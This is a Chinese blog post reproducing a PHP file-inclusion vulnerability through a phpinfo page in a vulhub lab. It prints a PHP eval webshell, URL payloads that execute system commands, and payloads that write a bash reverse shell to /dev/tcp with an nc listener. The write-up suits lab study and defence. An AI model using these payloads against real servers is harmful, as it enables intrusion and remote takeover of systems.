愿浪飒精神伴你左右,网络安全之路任重而道远。

php inclusion漏洞复现

漏洞复现 alsly 2年前 (2022-11-14) 331次浏览 0个评论
文章目录[隐藏]

利用场景

存在phpinfo页面,且存在文件包含漏洞,在找不到好的文件包含getshell时,可以使用。

该漏洞和php版本无关,即全版本通用。

环境搭建

使用vulhub靶场,进入漏洞目录,执行docker-compose up -d 创建容器(在root权限下执行)

php inclusion漏洞复现插图

下文出现的192.168.0.140在复现的过程中需要替换成你们vulhub搭建的ip,查看方法如下,需要注意使用docker搭建的靶场存在多张网卡,要确认好ip

php inclusion漏洞复现插图1

确认环境

访问phpinfo页面:http://192.168.0.140:8080/phpinfo.php

image-20221108150513783

访问文件包含页面:http://192.168.0.140:8080/lfi.php

php inclusion漏洞复现插图3

写入shell

执行exp命令py -2 .\exp.py 192.168.0.140 8080 100

php inclusion漏洞复现插图4

该exp写入一个永久的shell /tmp/g

<?=eval($_REQUEST[1])?>')?>

命令执行

利用文件包含,执行命令

http://192.168.0.140:8080/lfi.php?file=/tmp/g&1=system('id'));

php inclusion漏洞复现插图5

写入反弹shell

通过get传递数据写入反弹shell

http://192.168.0.140:8080/lfi.php?file=/tmp/g&1=system('echo "<?php system(\"bash -c \'exec bash -i %26>/dev/tcp/192.168.0.1/6666 <%261\'\");?>">/tmp/2.php');

image-20221108153015969

通过构造成post传递数据写入反弹shell

http://192.168.0.140:8080/lfi.php?file=/tmp/g&1=system($_POST[s]);

s=echo "<?php system(\"bash -c 'exec bash -i %26>/dev/tcp/192.168.0.1/6666 <%261'\");?>">/tmp/2.php

页面显示报错,没关系,反弹shell已经成功写入 image-20221108153813220

反弹shell

使用nc.exe -lvvp 6666 监听6666端口

image-20221108153243567

访问该页面利用文件包含执行反弹shell

http://192.168.0.140:8080/lfi.php?file=/tmp/2.php

显示正在连接,然后得到反弹shell

php inclusion漏洞复现插图9

获取exp

关注浪飒sec回复221109获取exp下载地址


本文标题:php inclusion漏洞复现
本文链接:https://blog.langsasec.cn/index.php/2022/11/14/php-inclusion/
版权声明: 本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!
喜欢 (1)
[]
分享 (0)
alsly
关于作者:
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址